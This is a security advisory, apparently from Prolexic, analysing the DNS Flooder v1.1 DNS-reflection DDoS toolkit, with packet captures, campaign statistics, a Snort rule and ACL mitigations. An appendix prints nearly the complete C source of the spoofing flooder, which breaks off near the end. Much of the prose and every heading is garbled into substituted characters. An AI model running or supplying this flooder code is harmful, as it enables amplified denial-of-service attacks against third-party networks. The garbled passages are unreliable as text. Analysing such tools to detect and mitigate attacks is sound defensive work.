DNS Amplification Tool Analysis

1
Risk Factor - High

!"# %&''()* +,-,
.#/ /!: 1063

01231/24
LxSerL has observed Lhe release and rapld deploymenL of a new unS reflecLlon LoolklL for dlsLrlbuLed denlal
of servlce (uuoS) aLLacks. 1he name of Lhls uuoS LoolklL ls unS llooder v1.1. lL was flrsL leaked on popular
hackforums and has been used agalnsL rolexlc cusLomers. 1hls LoolklL conLalns a new, popular meLhod of
crafLlng large unS resource records.

1hls new meLhod allows mallclous acLors Lo ampllfy responses by a facLor of 30 or more per requesL.
Mallclous acLors cusLomlze Lhelr own unS resource records, addlng words and commenLs LhaL may explaln
Lhelr parLlcular aLLack campalgn. 1hls meLhod expedlLes Lhe avallablllLy of Lhe unS boLneL for use and proflL ln
Lhe uuoS-for-hlre markeL.

1hls LhreaL advlsory ouLllnes a serles of lndlcaLors, lncludlng a full analysls of Lhe source code, LoolklL funcLlons,
mallclous payloads and recommended mlLlgaLlon Lechnlques for Lhe unS llooder v1.1 uuoS LoolklL.
/"!/56703# 0% !"# %800!23
1hls LacLlc generaLes resource records LhaL conLaln large responses (more Lhan 4,000 byLes) when querled wlLh
an An? (233) requesL from Lhe spoofed l address. 1he responses Lo Lhese An? requesLs resulL ln ampllfled
aLLack payloads. 1he Lechnlque baslcally crafLs requesLs wlLh record Lype An?, whlch Lhen wlll ellclL responses
LhaL are larger ln slze and dlrecLed aL Lhe LargeLed vlcLlms.

1hese ellclLed responses mlghL look slmllar Lo Lhe known lsc.org aLLack, whlch uses unSsec parameLers Lo
ampllfy responses, buL Lhey are noL.

1hls Lechnlque sLlll uLlllzes reflecLors, whlch allows Lhe aLLacker Lo boLh spoof Lhe lnlLlal requesLs and ampllfy
Lhe response. 8y uslng reflecLors, Lhe aLLacker ls able Lo mulLlply Lhe aLLack Lrafflc Lo Lhe LargeL and hlde Lhe
Lrue source of requesLs.

2

%9:;*) ,< 7=) &)>?)( !"# %&''()* +,-, @''&?9@
#0A352 50!2 6"68B#/#
LxSerL performed an analysls of Lhe source code of Lhe unS llooder v1.1 Lool. A seL of key funcLlonallLles of
Lhls Lool are ouLllned ln order Lo undersLand lLs crlLlcal feaLures and capablllLles.
#C''D9E: F9@= @=) /G =)>()*H
1he unS llooder LoolklL aLLempLs Lo spoof Lhe source l address of Lhe An? requesL for Lhe unS reflecLlon aLLack.
1hls works by manually consLrucLlng Lhe l header sLrucLure. 1he llne lph->saddr = lneL_addr(192.168.3.100"),
supplles Lhe l header wlLh a flxed source address of 192.168.3.100, whlch wlll reach Lhe unS server as belng
Lhe source of Lhe requesL. 1hls Lechnlque ls Lyplcally used Lo proLecL Lhe aLLacker from belng Lraced.

// Make the packet
struct iphdr *iph = (struct iphdr *) &strPacket;
iph->ihl = 5;
iph->version = 4;
iph->tos = 0;
iph->tot_len = sizeof(struct iphdr) + 38;
iph->id = htonl(54321);
iph->frag_off = 0;
iph->ttl = MAXTTL;
iph->protocol = IPPROTO_UDP;
iph->check = 0;
iph->saddr = inet_addr("192.168.5.100");
%9:;*) I< 7=) /G HC''D9E: D;EJ@9'EH 9E @=) !"# %&''()* +,-, J'()

3
5*>D@9E: @=) !"# 3)K;)H@
1hls porLlon of code wlll manually crafL a unS 8equesL header. lL ls observed LhaL Lhe LoolklL uses unS proLocol
speclflcaLlons (8lC 1033) wlLhln lLs parameLers. 1he !" fleld ls randomly generaLed uslng Lhe auLhor's own
random number generaLor funcLlon called rand_cmwc(). 1he #$ fleld ls seL Lo 0, Lhls speclfles LhaL lL wlll be a
requesL. 1he $" fleld ls seL Lo 1, Lhls speclfles LhaL recurslon ls deslred. AnoLher lmporLanL fleld Lo noLe ls Lhe
add_counL fleld. 1hls add_counL fleld ls seL Lo 1 Lo speclfy Lhere wlll be one %""!&!'()* ,-.'$"/ secLlon ln Lhe
unS 8equesL packeL.

struct DNS_HEADER *dns = (struct DNS_HEADER *) &strPacket[iPayloadSize];
dns->id = (unsigned short) htons(rand_cmwc());
dns->qr = 0; //This is a query
dns->opcode = 0; //This is a standard query
dns->aa = 0; //Not Authoritative
dns->tc = 0; //This message is not truncated
dns->rd = 1; //Recursion Desired
dns->ra = 0; //Recursion not available! hey we dont have it (lol)
dns->z = 0;
dns->ad = 0;
dns->cd = 0;
dns->rcode = 0;
dns->q_count = htons(1); //we have only 1 question
dns->ans_count = 0;
dns->auth_count = 0;
dns->add_count = htons(1); //One additional record
%9:;*) L< 7=) 3%5 ,MLN D9)&(H 9OC&)O)E@)( 9E !"# %&''()*
Cnce Lhe unS header ls complled, Lhe query requesL ls crafLed. llrsL, lL grabs Lhe domaln name conLalned ln
Lhe llnked llsL sLrucLure exLracLed from a conflgurable LexL flle.

//get the domain name and fix formatting
strcpy(strDomain, list_node->domain);
ChangetoDnsNameFormat(qname, strDomain);
%9:;*) P< !"# ('O>9E E>O) D'*O>@@9E:
1hen Lhe LoolklL populaLes Lhe q1ype and qClass of Lhe unS 8equesL flelds. 1he q1ype ls glven Lhe value of 233 or
0xll, whlch LranslaLes Lo an An? requesL. 1he qClass ls glven Lhe value 1, whlch represenLs lnLerneL addresses per
8lC 1033.

struct QUESTION *qinfo = (struct QUESTION *) &strPacket[iPayloadSize + iAdditionalSize];
qinfo->qtype = htons(255); //type of the query , A , MX , CNAME , NS etc
qinfo->qclass = htons(1); //Internet Addresses
%9:;*) N< !"# K;)H@9'E C>Q&'>( J'EH@*;J@9'E

4
Cnce LhaL lnformaLlon has been supplled, Lhe l and uu header lnformaLlon ls compleLed by updaLlng Lhe
slze and checksum flelds. 1he LoolklL auLhor commenLed Lhe code for clarlLy.

//update size of the udp packet
udph->len= htons((iPayloadSize + iAdditionalSize) - sizeof(struct iphdr));
//update the size of the entire packet in the IP header
iph->tot_len = iPayloadSize + iAdditionalSize;
//radonmize the source port each time
udph->source = htons(rand_cmwc() & 0xFFFF);
//calculate the checksum
iph->check = csum ((unsigned short *) strPacket, iph->tot_len >> 1);
%9:;*) R< G>J?)@ =)>()* J'ED9:;*>@9'E
AnoLher lmporLanL feaLure of unS llooder ls lLs ablllLy Lo send a requesL LhaL wlll ensure Lhe largesL posslble
response from Lhe server. lL does Lhls by lncludlng an AddlLlonal 8ecord secLlon Lo enforce LunS (LxLended
unS) and seL Lhe slze of Lhe uu payload response Lo 9,000 byLes (0x2328). 1hls allows Lhe unS server Lo send
a large response Lo Lhe vlcLlm wlLhouL LruncaLlon or reLransmlsslons. 1he code for Lhls funcLlon ls shown ln
llgure 7.

strPacket[iPayloadSize + iAdditionalSize] = 0x00;
strPacket[iPayloadSize + iAdditionalSize + 1] = 0x00;

iAdditionalSize += 11;
%9:;*) S< 6((9@9'E>& 3)J'*(H J*)>@9'E
Cnce Lhls sLep ls compleLed, Lhe LoolklL wlll loop Lhe unS requesL 13 Llmes, sendlng lL ln a Lhread funcLlon.
1hls occurs for each unS server LhaL ls deflned ln Lhe conflgurable LexL flle and ls passed as an argumenL Lo
Lhe LoolklL.

//send
for(i = 0; i < PACKETS_PER_RESOLVER; i++)
{
//usleep(1);
sendto(s, strPacket, iph->tot_len, 0, (struct sockaddr *) &list_node->data,
sizeof(list_node->data));
}
%9:;*) T< G>Q&'>( (9H@*9U;@9'E '+)* @=) E)@F'*?

5
1he source code for unS llooder v1.1 reveals some common Lechnlques for l spooflng and uLlllzlng raw
sockeLs ln order Lo crafL Lhe uu payload by hand. 1he auLhor carefully crafLs a unS requesL LhaL uses nuances
of Lhe unS proLocol Lo ampllfy response packeLs wlLh full anonymlLy. lL ls also worLh noLlng LhaL, because Lhls
Lool uLlllzes raw sockeLs, lL can only be run wlLh rooL prlvlleges. lurLhermore, lL's evldenL Lhe source code was
noL deslgned Lo be complled under 8Su-flavored Llnux envlronmenLs (lncludlng Mac CSx's uarwln). lL wlll fall
Lo complle ln Lhese envlronmenLs due Lo lncompaLlblllLles ln Lhe deflnlLlons of Lhe l and LransporL proLocol
flelds ln Lhe source header flles.
7''&?9@ )V)J;@9'E< W;)*Q >E( C>Q&'>(
Cnce Lhe LoolklL has been complled, Lhe mallclous acLor wlll execuLe lL. 8y uLlllzlng Lhe approprlaLe command
llne argumenLs, Lhe aLLacker can begln produclng spoofed unS querles Lo LargeL vlcLlms. A sample query ls
shown ln llgure 9.

%9:;*) X< #>OC&) K;)*Q :)E)*>@)( UQ @=) !"# %&''()* @''&?9@

6
llgure 10 shows Lhe execuLlon of Lhe payload. noLlce LhaL Lhe reply from Lhe vlcLlm servers exceeds 4,000
byLes and creaLes subsequenL fragmenLaLlon. 1hls ls a resulL of unS servers ampllfylng Lhe query response.

Payload was split into 3 fragments
192.168.20.16 = DNS server used to amplify query response
192.168.20.50 = Target

Code snippet fragment 1:
19:05:53.826828 IP (tos 0x0, ttl 64, id 47098, offset 0, flags [+], proto UDP (17), length
1500)
192.168.20.16.53 > 192.168.20.50.16034: 28384| 251/0/1 x.x.x.x.com. TXT
"Jvvcxjoijcxoivjoixcjiojdiw9jd9wj9jf9w9wj9", x.x.x.x.com. A 192.168.50.241, x.x.x.x.com. A
192.168.50.242, x.x.x.x.com. A 192.168.50.243, x.x.x.x.com. A 192.168.50.244, x.x.x.x.com. A
192.168.50.76, x.x.x.x.com. A 192.168.50.77[|domain]
E..... .@..........2.5>....Wn............x.x.x.x.com............
:..*)Jvvcxjoijcxoivjoixcjiojdiw9jd9wj9jf9w9wj9

19:05:53.827139 IP (tos 0x0, ttl 64, id 47098, offset 1480, flags [+], proto UDP (17),
length 1500)
192.168.20.16 > 192.168.20.50: ip-proto-17
E..... .@..........2....... :.....2N....... :.....2O....... :.....2P.......

19:05:53.827148 IP (tos 0x0, ttl 64, id 47098, offset 2960, flags [none], proto UDP (17),
length 1159)
192.168.20.16 > 192.168.20.50: ip-proto-17
E......r@..g.......2:.....2........ :.....2........ :.....2........
%9:;*) ,M< #>OC&) C>Q&'>( )V)J;@9'E
8unnlng Lhe LoolklL requlres a few command llne argumenLs Lo be passed. 1he command llne formaL and
opLlons are explalned below.

sudo ./dnsflood [target_ip] [53] [reflectlist.txt] [1] [1]
@>*:)@Y9C: 1he l address of Lhe lnLended LargeL of Lhe reflecLlon aLLack
NL< 1he porL used ln Lhe aLLack. 1hls ls hardcoded Lo porL 33 ln Lhe source code.
*)D&)J@&9H@-@V@< 1he llsL of unS servers whlch wlll recelve Lhe requesLs. 1he crafLed requesL lncludes Lhe
spoofed l address of Lhe LargeL. 1he unS servers wlll reflecL Lhe responses Lo Lhe LargeL.
, ,< 1he flrsL number deflnes Lhe quanLlLy of Lhreads. 1he second number deflnes Lhe duraLlon of Lhe
LoolklL execuLlon (ln seconds).

As a resulL, Lhls command wlll execuLe unS An? querles agalnsL a LargeL l address uslng Lhe deslgnaLed
reflecLlon llsL (Lhe unS servers seL up by Lhe mallclous acLors), uLlllzlng a speclfled number of Lhreads (1) and
duraLlon ln seconds (1). 1hls wlll produce an ampllfled reflecLed response aL a raLlo of 1:30, lnLended Lo
consume LargeL resources.

7
Z68/5/0A# 65703 6773/[A7/0"
llgure 11 shows a snlppeL of Lhe Al code pulled from a server LhaL was belng used ln a booLer lnfrasLrucLure.
Pere Lhe LoolklL has been renamed from unS llooder v1.1 Lo 012, llkely because of lLs ablllLy Lo produce 30x
ampllflcaLlon.

%9:;*) ,,< 6G/ J'() 'D > U''@)* 9ED*>H@*;J@;*) ;H9E: > *)E>O)( !"# %&''()* @''&
uynamlcally execuLlng 012 reveals LhaL lL ls lndeed unS llooder v1.1.

%9:;*) ,I< 2V)J;@9'E 'D !"# %&''()* +,-, @=*';:= !"# 6G/
86[ #7A!B
unS llooder v1.1 was analyzed ln LxserL's lab envlronmenL Lo deLermlne lLs characLerlsLlcs. A few Lechnlcal
feaLures were observed.

llrsL, when run wlLh one Lhread agalnsL mulLlple desLlnaLlons:

%9:;*) ,L< !"# %&''()* +,-, >@@>J? HJ*9C@ F9@= @=) @=*)>(H >*:;O)E@ H)@ @' ,- 7=) K;)*Q /!H >*) >&& 9()E@9J>&-

8
When run wlLh mulLlple Lhreads agalnsL mulLlple desLlnaLlons:

%9:;*) ,P< !"# %&''()* +,-, >@@>J? HJ*9C@ F9@= @=*)>(H >*:;O)E@ H)@ @' ,M- 7)E (9DD)*)E@ K;)*Q /!H F)*) 'UH)*+)(-
1he flndlngs were lnLeresLlng. AfLer analyzlng Lhe source code and Lhe packeL daLa, lL can be observed LhaL
each Lhread has a sLaLlc query lu assoclaLed wlLh lL. 1hls allows us Lo analyze Lhe query lus from Lhe reflecLed
response Lrafflc (prlmary LargeL Lrafflc) and deLermlne how many unlque Lhreads were used ln Lhe aLLack lLself.

LxecuLlng Lhe followlng Lshark sLaLemenL agalnsL a pcap from Lhe prlmary LargeL reveals Lhe number of
Lhreads launched by Lhe mallclous acLor.

for l ln `flnd ./ | grep '.pcap$'`, do Lshark -nnr $l -8 'udp.srcporL == 33' -o
column.formaL:'"unSlu","Cus:dns.ld"' ,done | sorL -n | unlq -c

for i in `find ./ | grep 'dnsreflect-4155_byte_response.pcap$'`; do tshark -nnr $i -2 -R
'udp.srcport == 53' -o column.format:'"DNSID","%Cus:dns.id"' ;done | sort -n | uniq -c

4396 0x6ee0
Where 0x6ee0 is the unique ID and 4396 is the number of instances that match the ID.
%9:;*) ,N< 7=) @H=>*? :*)C H@>@)O)E@ 9()E@9D9)( P\XLR ;E9K;) @=*)>(H
3250ZZ2"!2! Z/7/.67/0"
!"# %&''()* HE'*@ *;&)
alerL udp $Lx1L8nAL_nL1 any -> $PCML_nL1 33 (msg:"unS flooder 1.1 abuse", sld:20130113, rev:1, \
conLenL: "|00 ff 00 01 00 00 29 23 28|", offseL: 12, )

7>*:)@ O9@9:>@9'E ;H9E: 658 )E@*9)H
deny udp any eq 33 hosL x.x.x.x gL 1023
deny udp any hosL x.x.x.x fragmenLs

9
0[#2312! 56ZG6/."#
1he unS llooder v1.1 LoolklL has been observed belng used ln mulLlple campalgns durlng C3 and C4 2013.
1hls secLlon wlll dlscuss Lwo examples of unS llooder v1.1 uuoS aLLacks agalnsL rolexlc's cusLomers.
6@@>J? 6
Cne aLLack based on Lhe unS llooder v1.1 LoolklL lasLed approxlmaLely four hours. 1he aLLack sLaLlsLlcs from
our scrubblng cenLers are llsLed below.

San !ose London Pong kong WashlngLon
G)>? U9@H C)* H)J'E( ]UCH^ 3.00 Cbps 80.00 Cbps 3.00 Cbps 20.00 Cbps
G)>? C>J?)@H C)* H)J'E( ]CCH^ 400.00 kpps 7.30 Mpps 400.00 kpps 2.00 Mpps
%9:;*) ,R< G)>? +>&;)H J'OC9&)( UQ G*'&)V9J HJ*;UU9E: J)E@)* D'* @=) D9*H@ J>OC>9:E
6@@>J? C>Q&'>(

18:48:52.102410 IP xxx.xxx.xxx.xxx.53 > xxx.xxx.xxx.xxx.7403: 36420 246/2/5 A 5.135.4.1, A
5.135.4.10, A 5.135.4.11, A 5.135.4.12, A 5.135.4.13, A 5.135.4.14, A 5.135.4.15, A
5.135.4.16, A 5.135.4.17, A 5.135.4.18, A 5.135.4.19, A 5.135.4.2, A 5.135.4.20, A
5.135.4.21, A 5.135.4.22, A 5.135.4.23, A 5.135.4.24, A 5.135.4.25, A 5.135.4.26, A
5.135.4.27, A 5.135.4.28, A 5.135.4.29, A 5.135.4.3, A 5.135.4.30, A 5.135.4.4, A
5.135.4.5, A 5.135.4.6, A 5.135.4.7, A 5.135.4.8, A 5.135.4.9, A 5.135.4.31, A 5.135.4.32,
A 5.135.4.33, A 5.135.4.34, A 5.135.4.35, A 5.135.4.36, A 5.135.4.37, A 5.135.4.38, A
5.135.4.39, A 5.135.4.40, A 5.135.4.41, A 5.135.4.42, A 5.135.4.43, A 5.135.4.44, A
5.135.4.45, A 5.135.4.46, A 5.135.4.47, A 5.135.4.48, A 5.135.4.49, A 5.135.4.50, A
5.135.4.51, A 5.135.4.52, A 5.135.4.53, A 5.135.4.54, A 5.135.4.55, A 5.135.4.56, A
5.135.4.57, A 5.135.4.58, A 5.135.4.59, A 5.135.4.60, A 5.135.4.61, A 5.135.4.62, A
5.135.4.63, A 5.135.4.64, A 5.135.4.65, A 5.135.4.66, A 5.135.4.67, A 5.135.4.68, A
5.135.4.69, A 5.135.4.70, A 5.135.4.71, A 5.135.4.xxx, A 5.135.4.73, A 5.135.4.74, A
5.135.4.75, A 5.135.4.76, A 5.135.4.77, A 5.135.4.78, A 5.135.4.79, A 5.135.4.80, A
5.135.4.81, A 5.135.4.82, A 5.135.4.83, A 5.135.4.84, A 5.135.4.85, A 5.135.4.86, A
5.135.4.87, A 5.135.4.88, A 5.135.4.89, A 5.135.4.90,[|domain]

18:49:29.888142 IP xxx.xxx.xxx.xxx > xxx.xxx.xxx.xxx: udp
....E..s.LAp..^.@H."H4..[n..............[n..............[n..............[n..............[n.
.............[n..............[n..............[n..............[n..............[n............
..[n..............[n..............[n..............[n..............[n..............[n.......
.......[n..............[n..............[n..............[n..............[n..............[n..
............[n..............[n..............[n..............[n..............[n.............
.[n..............[n..............[n..............[n..............[n..............[n........
......[n..............[n..............[n..............[n..............[n..............[n...
...........[n..............[n..............[n..............[n..............[n..............
[n..............[n..............[n..............[n..............[n..............[n.........
.....[n..............[n..............[n..............[n..............[n..............[n....
..........[n..............[n..............[n..............[n..............[n..............[
n..............[n..............[n..............[n..............[n..............[n...ns2.)..
......[n...%........[n...%........[n......)........
18:49:29.994978 IP xxx.xxx.xxx.xxx > xxx.xxx.xxx.xxx: udp
....E..c.N.r;.[..>Y)H4...P...............P...............P...............P...............P.
..............P...............P...............P...............P...............P............
...P...............P...............P...............P...............P...............P.......
........P...............P...............P...............P...............P...............P..
.............P...............P...............P...............P...............P.............
..P...............P..... .........P.....
.........P...............P...............P...............P...............P...............P.
..............P...............P...............P...............P...............P............
...P...............P...............P...............P...............P...............P.......
........P...............P.....
.........P.....!.........P.....".........P.....#.........P.....$.........P.....%.........P.
10
....&.........P.....'.........P.....(.........P.....).........P.....*.........P.....+......
...P.....,.........P.....-.........Q...ns2.).........Q...%.........Q...%.........Q......).
%9:;*) ,S< 6@@>J? H9:E>@;*) ;H)( 9E @=) !"# %&''()* J>OC>9:EH
Cne of Lhe sLeps Laken by mallclous acLors prlor Lo Lhe use of Lhls Lool was Lhe seLup of unS servers LhaL wlll
respond and ampllfy Lhe aLLackers' unS querles. 1hls sLep ensures Lhe responses wlll be dlrecLed Lo Lhe
lnLended LargeL. All aLLack Lrafflc was successfully mlLlgaLed by rolexlc.
6@@>J? [
1he second example was ldenLlfled by lLs use of resource records LhaL conLalned large responses of more Lhan
4,000 byLes when querled wlLh an An? (233) requesL.

San !ose London Pong kong WashlngLon
G)>? U9@H C)* H)J'E( ]UCH^ 433.17 Mbps 2.19 Cbps 1.09 Cbps 1.26 Cbps
G)>? C>J?)@H C)* H)J'E( ]CCH^ 43.13 kpps 208.86 kpps 106.03 kpps 118.33 kpps
%9:;*) ,T< G)>? +>&;)H J'OC9&)( UQ @=) G*'&)V9J HJ*;UU9E: J)E@)*H D'* @=) H)J'E( J>OC>9:E
1hls unS llooder LoolklL can produce slgnlflcanL bandwldLh power wlLh only a few servers. lor example, 1 Cbps
of aLLack bandwldLh could yleld 30 Cbps of reflecLed aLLack Lrafflc. ln boLh campalgns menLloned ln Lhls
documenL, false unS resource records were used Lo ampllfy responses. 1he LoolklL hldes lLs l address by
spooflng Lhe unS requesL as orlglnaLlng from Lhe LargeL. CrafLlng Lhe unS resource record requlres rooL or
sysLem level access Lo Lhe boLneL servers and compllcaLes plnpolnLlng Lhe orlgln of Lhe aLLack. 1hls allows
mallclous acLors Lo use Lhelr own aLLack resources for performlng unS reflecLlon floods and lends lLself Lo be a
forceful Lool ln uuoS-for-hlre scenarlos.

LxserL wlll conLlnue analyzlng Lhls uuoS LoolklL Lo lnclude posslble upcomlng varlaLlons, and lssue new LhreaL
advlsorles should lL be warranLed.

11
50"73/[A703#
LxserL
6[0A7 7_2 G3082`/5 #25A3/7B 2"./"223/". 6"! 32#G0"#2 726Z ]G8`H)*@^
LxserL monlLors mallclous cyber LhreaLs globally and analyzes uuoS aLLacks uslng proprleLary Lechnlques and
equlpmenL. 1hrough dlglLal forenslcs and posL-aLLack analysls, LxserL ls able Lo bulld a global vlew of uuoS
aLLacks, whlch ls shared wlLh cusLomers and Lhe securlLy communlLy. 8y ldenLlfylng Lhe sources and assoclaLed
aLLrlbuLes of lndlvldual aLLacks, Lhe LxserL Leam helps organlzaLlons adopL besL pracLlces and make more
lnformed, proacLlve declslons abouL uuoS LhreaLs.
6[0A7 G3082`/5
rolexlc ls Lhe world's largesL, mosL LrusLed ulsLrlbuLed uenlal of Servlce (uuoS) mlLlgaLlon provlder. Able Lo
absorb Lhe largesL and mosL complex aLLacks ever launched, rolexlc resLores mlsslon-crlLlcal lnLerneL-faclng
lnfrasLrucLures for global enLerprlses and governmenL agencles wlLhln mlnuLes. 1en of Lhe world's largesL
banks and Lhe leadlng companles ln e-Commerce, SaaS, paymenL processlng, energy, Lravel/hosplLallLy,
gamlng and oLher aL-rlsk lndusLrles rely on rolexlc Lo proLecL Lhelr buslnesses. lounded ln 2003 as Lhe world's
flrsL ln-Lhe-cloud uuoS mlLlgaLlon plaLform, rolexlc ls headquarLered ln lorL Lauderdale, llorlda and has
scrubblng cenLers locaLed ln Lhe Amerlcas, Lurope and Asla. 1o learn more abouL how rolexlc can sLop uuoS
aLLacks and proLecL your buslness, please vlslL www.prolexlc.com, follow us on Llnkedln, lacebook, Coogle+,
?ou1ube3 and [rolexlc on 1wlLLer.

12
6!!2"!AZ< %A88 #0A352 50!2 0% !"# %800!23
1hls source code ls avallable aL hLLps://glLhub.com/plxserLr/dnsreflecL for research purposes.

C code

#include <time.h>
#include <pthread.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <arpa/inet.h>

#define MAX_PACKET_SIZE 8192
#define PHI 0x9e3779b9
#define PACKETS_PER_RESOLVER 15

static uint32_t Q[4096], c = 362436;

struct list
{
struct sockaddr_in data;
char domain[512];
int line;
struct list *next;
struct list *prev;
};
struct list *head;

struct thread_data{
int thread_id;
struct list *list_node;
struct sockaddr_in sin;
int port;
};

struct DNS_HEADER
{
unsigned short id; // identification number

unsigned char rd :1; // recursion desired
unsigned char tc :1; // truncated message
unsigned char aa :1; // authoritive answer
unsigned char opcode :4; // purpose of message
unsigned char qr :1; // query/response flag

unsigned char rcode :4; // response code
unsigned char cd :1; // checking disabled
unsigned char ad :1; // authenticated data
unsigned char z :1; // its z! reserved
unsigned char ra :1; // recursion available

unsigned short q_count; // number of question entries
unsigned short ans_count; // number of answer entries
unsigned short auth_count; // number of authority entries
unsigned short add_count; // number of resource entries
};
13

//Constant sized fields of query structure
struct QUESTION
{
unsigned short qtype;
unsigned short qclass;
};

//Constant sized fields of the resource record structure
struct QUERY
{
unsigned char *name;
struct QUESTION *ques;
};

void ChangetoDnsNameFormat(unsigned char* dns,unsigned char* host)
{
int lock = 0 , i;
strcat((char*)host,".");

for(i = 0 ; i < strlen((char*)host) ; i++)
{
if(host[i]=='.')
{
*dns++ = i-lock;
for(;lock<i;lock++)
{
*dns++=host[lock];
}
lock++; //or lock=i+1;
}
}
*dns++='\0';
}

void init_rand(uint32_t x)
{
int i;

Q[0] = x;
Q[1] = x + PHI;
Q[2] = x + PHI + PHI;

for (i = 3; i < 4096; i++)
Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
}

uint32_t rand_cmwc(void)
{
uint64_t t, a = 18782LL;
static uint32_t i = 4095;
uint32_t x, r = 0xffe;
i = (i + 1) & 4095;
t = a * Q[i] + c;
c = (t >> 32);
x = t + c;
if (x < c) {
x++;
c++;
}
return (Q[i] = r - x);
}

14
/* function for header checksums */
unsigned short csum (unsigned short *buf, int nwords)
{
unsigned long sum;
for (sum = 0; nwords > 0; nwords--)
sum += *buf++;
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
return (unsigned short)(~sum);
}

void setup_udp_header(struct udphdr *udph)
{

}

void *flood(void *par1)
{
struct thread_data *td = (struct thread_data *)par1;

char strPacket[MAX_PACKET_SIZE];
int iPayloadSize = 0;

struct sockaddr_in sin = td->sin;
struct list *list_node = td->list_node;
int iPort = td->port;

int s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if(s < 0)
{
fprintf(stderr, "Could not open raw socket. You need to be root!\n");
exit(-1);
}

//init random
init_rand(time(NULL));

// Clear the data
memset(strPacket, 0, MAX_PACKET_SIZE);

// Make the packet
struct iphdr *iph = (struct iphdr *) &strPacket;
iph->ihl = 5;
iph->version = 4;
iph->tos = 0;
iph->tot_len = sizeof(struct iphdr) + 38;
iph->id = htonl(54321);
iph->frag_off = 0;
iph->ttl = MAXTTL;
iph->protocol = IPPROTO_UDP;
iph->check = 0;
iph->saddr = inet_addr("192.168.5.100");

iPayloadSize += sizeof(struct iphdr);

struct udphdr *udph = (struct udphdr *) &strPacket[iPayloadSize];
udph->source = htons(iPort);
udph->dest = htons(53);
udph->check = 0;

iPayloadSize += sizeof(struct udphdr);

struct DNS_HEADER *dns = (struct DNS_HEADER *) &strPacket[iPayloadSize];
15
dns->id = (unsigned short) htons(rand_cmwc());
dns->qr = 0; //This is a query
dns->opcode = 0; //This is a standard query
dns->aa = 0; //Not Authoritative
dns->tc = 0; //This message is not truncated
dns->rd = 1; //Recursion Desired
dns->ra = 0; //Recursion not available! hey we dont have it (lol)
dns->z = 0;
dns->ad = 0;
dns->cd = 0;
dns->rcode = 0;
dns->q_count = htons(1); //we have only 1 question
dns->ans_count = 0;
dns->auth_count = 0;
dns->add_count = htons(1);

iPayloadSize += sizeof(struct DNS_HEADER);

sin.sin_port = udph->source;
iph->saddr = sin.sin_addr.s_addr;
iph->daddr = list_node->data.sin_addr.s_addr;

char strDomain[512];
int i;
int j = 0;
int iAdditionalSize = 0;
while(1)
{
if(j==2){
usleep(100);
j=0;
}

//set the next node
list_node = list_node->next;

//Clear the old domain and question
memset(&strPacket[iPayloadSize + iAdditionalSize], 0, iAdditionalSize+256);

//add the chosen domain and question
iAdditionalSize = 0;

unsigned char *qname = (unsigned char*) &strPacket[iPayloadSize + iAdditionalSize];

strcpy(strDomain, list_node->domain);
ChangetoDnsNameFormat(qname, strDomain);
//printf("!!%s %d\n", list_node->domain, list_node->line);

iAdditionalSize += strlen(qname) + 1;

struct QUESTION *qinfo = (struct QUESTION *) &strPacket[iPayloadSize + iAdditionalSize];
qinfo->qtype = htons(255); //type of the query , A , MX , CNAME , NS etc
qinfo->qclass = htons(1);

iAdditionalSize += sizeof(struct QUESTION);

strPacket[iPayloadSize + iAdditionalSize] = 0x00;
16

iAdditionalSize += 11;

//set new node data
iph->daddr = list_node->data.sin_addr.s_addr;

udph->len= htons((iPayloadSize + iAdditionalSize) - sizeof(struct iphdr));
iph->tot_len = iPayloadSize + iAdditionalSize;

udph->source = htons(rand_cmwc() & 0xFFFF);

//send
for(i = 0; i < PACKETS_PER_RESOLVER; i++)
{
//usleep(1);
sendto(s, strPacket, iph->tot_len, 0, (struct sockaddr *) &list_node->data,
sizeof(list_node->data));
}

j++;
}
}

void ParseResolverLine(char *strLine, int iLine)
{
char caIP[32] = "";
char caDNS[512] = "";

int i;
char buffer[512] = "";

int moved = 0;

for(i = 0; i < strlen(strLine); i++)
{
if(strLine[i] == ' ' || strLine[i] == '\n' || strLine[i] == '\t')
{
moved++;
continue;
}

if(moved == 0)
{
caIP[strlen(caIP)] = (char) strLine[i];
}
else if(moved == 1)
{
caDNS[strlen(caDNS)] = (char) strLine[i];
}
}
//printf("Found resolver %s, domain %s!\n", caIP, caDNS);

if(head == NULL)
{
head = (struct list *)malloc(sizeof(struct list));

17
bzero(&head->data, sizeof(head->data));

head->data.sin_addr.s_addr=inet_addr(caIP);
head->data.sin_port=htons(53);
strcpy(head->domain, caDNS);
head->line = iLine;
head->next = head;
head->prev = head;
}
else
{
struct list *new_node = (struct list *)malloc(sizeof(struct list));

memset(new_node, 0x00, sizeof(struct list));

new_node->data.sin_addr.s_addr=inet_addr(caIP);
new_node->data.sin_port=htons(53);
strcpy(new_node->domain, caDNS);
new_node->prev = head;
head->line = iLine;
new_node->next = head->next;
head->next = new_node;
}
}

int main(int argc, char *argv[ ])
{
if(argc < 4)
{
fprintf(stderr, "Invalid parameters!\n");
fprintf(stderr, "DNS Flooder v1.1\nUsage: %s <target IP/hostname> <port to hit>
<reflection file (format: IP DOMAIN>> <number threads to use> <time (optional)>\n",
argv[0]);
fprintf(stderr, "Reflection File Format:
<IP>[space/tab]<DOMAIN>[space/tab]<IGNORED>[space/tab]<IGNORED>...\n");
exit(-1);
}

// printf("1");
head = NULL;

char *strLine = (char *) malloc(256);
strLine = memset(strLine, 0x00, 256);

char strIP[32] = "";
char strDomain[256] = "";

int iLine = 0; // 0 = ip, 1 = domain.

FILE *list_fd = fopen(argv[3], "r");
while(fgets(strLine, 256, list_fd) != NULL)
{
ParseResolverLine(strLine, iLine);
iLine++;
}
//printf("2");

int i = 0;
int num_threads = atoi(argv[4]);

struct list *current = head->next;
pthread_t thread[num_threads];
struct sockaddr_in sin;
18
sin.sin_family = AF_INET;
sin.sin_port = htons(0);
sin.sin_addr.s_addr = inet_addr(argv[1]);
struct thread_data td[num_threads];

int iPort = atoi(argv[2]);
//printf("3");
//printf("Target: %s:%d\n", argv[1], iPort);

for(i = 0; i < num_threads; i++)
{
current = current->next;
td[i].thread_id = i;
td[i].sin= sin;
td[i].list_node = current;
td[i].port = iPort;
pthread_create( &thread[i], NULL, &flood, (void *) &td[i]);
}
//printf("4");
// fprintf(stdout, "Starting Flood...\n");

if(argc > 4)
{
sleep(atoi(argv[5]));
}
else
{
